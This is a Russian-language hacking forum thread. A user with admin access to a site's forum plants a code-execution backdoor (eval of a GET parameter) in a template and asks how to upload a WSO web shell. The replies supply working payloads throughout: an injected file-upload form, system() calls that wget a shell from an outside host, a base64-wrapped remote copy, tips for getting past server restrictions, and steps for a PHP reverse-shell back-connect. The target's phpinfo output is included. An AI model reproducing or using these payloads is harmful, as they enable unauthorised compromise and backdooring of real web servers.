В общем есть доступ в админку

пробую залить шелл через правку шаблона

вставляю код eval($_GET[cmd]);

проверяю site.ru/forum/index.php?cmd=phpinfo(); - Работает

А вот когда пытаюсь залить шелл он почему то не заливается

делаю вот так site.ru/forum/index.php?cmd=$url=$_GET;$content= file_get_contents($url);...ничку
подскажите как ещё я могу залить шелл

site.ru/forum/index.php?cmd=$url=$_GET;$content= file_get_contents($url);...me/sait.ru/www; mv wso.txt wso.php");

[/QUOTE]

[/QUOTE]

Попробуй так:

site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

шелл будет лежать site.ru/forum/название_закачиваемого_фай ла.php

OxoTnik said:
Скажи, а нахрена тебе эта порнография ?
давай по простому
Или так


да просто всегда так заливал!

copy("http://сайт/wso.txt","2.php"); - не работает

file_put_contents('2.php', file_get_contents('http://сайт/wso.txt')); - не работает

и это тоже не работает

?cmd=system("cd /home/sait.ru/www; wget http://сайт/wso.txt");

далее

?cmd=system("cd /home/sait.ru/www; mv wso.txt wso.php");

eval(base64_decode (Y29weSgiaHR0cDovL9GB0LDQudGCL3dzby50eHQiLCIyLnBoc CIpOw))%3b ??

Да быть такого не может чтобы через wget не заливалось...

Evil_Genius said:
Попробуй так:
site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=
шелл будет лежать site.ru/forum/название_закачиваемого_фай ла.php


Не много тебя не до понял

site.ru/forum/название_закачиваемого_фай ла.php

а где мне название это написать?

Hapk said:
Не много тебя не до понял
site.ru/forum/название_закачиваемого_фай ла.php
а где мне название это написать?


закачиваешь файл под названием file.php - у тебя такое и буде название site.ru/forum/file.php

OxoTnik said:
eval(base64_decode (Y29weSgiaHR0cDovL9GB0LDQudGCL3dzby50eHQiLCIyLnBoc CIpOw))%3b ??
Да быть такого не может чтобы через
wget
не заливалось...



Так тоже не работает((

Hapk said:
Так тоже не работает((


так ты запрос изменил под себя я надеюсь ?

Если что в личку кинь, посмотрю

Evil_Genius said:
закачиваешь файл под названием file.php - у тебя такое и буде название site.ru/forum/file.php


я когда вот так делаю

site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

у меня нечего не происходит

Hapk said:
я когда вот так делаю
site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=
у меня нечего не происходит


Тут по идее должна гдето вылезти форма с закачивание файла и кнопкой "Обзор".

я видел тут несколько людей с экстрасенсорными способностями, только они оффлайн... phpinfo кинь...

скинь директивы пхпинфо сюда

disabled_functions, safe_mode, allow_url_fopen и тп..

проверь папку на вритабельность, запиши сначала шелл в тмп, попробуй инклудить

возможно mq включено, используй stripslashes в бекдоре

2 Охотник


eval(base64_decode (Y29weSgiaHR0cDovL9GB0LDQudGCL3dzby50eHQiLCIyLnBoc CIpOw))%3b ??


string base64_decode ( string $data [, bool $strict = false ] )

ponel?

Evil_Genius said:
Тут по идее должна гдето вылезти форма с закачивание файла и кнопкой "Обзор".


блин просто не увидел форму для загрузки файлов

но когда попробовал залить через неё у меня он походу не залился не фига

вот небольшой кусок phpinfo

Directive Local Value Master Value

allow_call_time_pass_reference Off Off

allow_url_fopen On On

allow_url_include Off Off

always_populate_raw_post_data Off Off

arg_separator.input & &

arg_separator.output & &

asp_tags Off Off

auto_append_file no value no value

auto_globals_jit On On

auto_prepend_file no value no value

browscap no value no value

default_charset no value no value

default_mimetype text/html text/html

define_syslog_variables Off Off

detect_unicode On On

disable_classes no value no value

disable_functions no value no value

display_errors Off Off

display_startup_errors Off Off

doc_root no value no value

docref_ext no value no value

docref_root no value no value

enable_dl On On

error_append_string no value no value

error_log no value no value

error_prepend_string no value no value

error_reporting 6135 0

expose_php On On

extension_dir /usr/local/lib/php/20060613 /usr/local/lib/php/20060613

file_uploads On On

highlight.bg #FFFFFF #FFFFFF

highlight.comment #FF8000 #FF8000

highlight.default #0000BB #0000BB

highlight.html #000000 #000000

highlight.keyword #007700 #007700

highlight.string #DD0000 #DD0000

html_errors On On

ignore_repeated_errors Off Off

ignore_repeated_source Off Off

ignore_user_abort Off Off

implicit_flush Off Off

include_path .:/usr/local/share/pear .:/usr/local/share/pear

log_errors On On

log_errors_max_len 1024 1024

magic_quotes_gpc On On

magic_quotes_runtime Off Off

magic_quotes_sybase Off Off

mail.force_extra_parameters no value no value

max_execution_time 90 90

max_file_uploads 20 20

max_input_nesting_level 64 64

max_input_time 60 60

memory_limit 192M 192M

open_basedir /home/www/site.ru/public_html/:/var/tmp/:/tmp/ no value

output_buffering 4096 4096

output_handler no value no value

post_max_size 100M 100M

precision 14 14

realpath_cache_size 16K 16K

realpath_cache_ttl 120 120

register_argc_argv Off Off

register_globals Off Off

register_long_arrays Off Off

report_memleaks On On

report_zend_debug On On

safe_mode Off Off

safe_mode_exec_dir no value no value

safe_mode_gid Off Off

safe_mode_include_dir no value no value

sendmail_from no value no value

sendmail_path /usr/sbin/sendmail -t -i /usr/sbin/sendmail -t -i

serialize_precision 100 100

short_open_tag On On

SMTP localhost localhost

smtp_port 25 25

sql.safe_mode Off Off

suhosin.log.phpscript 0 0

suhosin.log.phpscript.is_safe Off Off

suhosin.log.phpscript.name no value no value

suhosin.log.sapi no value no value

suhosin.log.script no value no value

suhosin.log.script.name no value no value

suhosin.log.syslog no value no value

suhosin.log.syslog.facility no value no value

suhosin.log.syslog.priority no value no value

suhosin.log.use-x-forwarded-for Off Off

track_errors Off Off

unserialize_callback_func no value no value

upload_max_filesize 100M 100M

upload_tmp_dir no value no value

user_dir no value no value

variables_order GPCS GPCS

xmlrpc_error_number 0 0

xmlrpc_errors Off Off

y2k_compliance On On

zend.ze1_compatibility_mode Off Off

Проблема не решена((

Кто ещё чем может помочь?

скорее всего прав не хватает,попробуй в другую диру залится

sova1611 said:
скорее всего прав не хватает,попробуй в другую диру залится


много папок перепробовал

но без результатно

Hapk said:
много папок перепробовал
но без результатно


Сдаётся мне что вам попался хорошо настроенный сервер.

Можете радоваться - сорвали ДжекПот ! )

Однако, решение есть - и оно у всех на виду.

1) Шаг первый - ищем бэкконект на php (2кб).

2) Шаг второй - base64encode()

3) Шаг третий - eval(base64decode(backconnect))

BigBear said:
Сдаётся мне что вам попался хорошо настроенный сервер.
Можете радоваться - сорвали ДжекПот ! )
Однако, решение есть - и оно у всех на виду.
1) Шаг первый - ищем бэкконект на php (2кб).
2) Шаг второй - base64encode()
3) Шаг третий - eval(base64decode(backconnect))


Однако я не очень это понял(( в icq ответь

или объясни здесь по подробней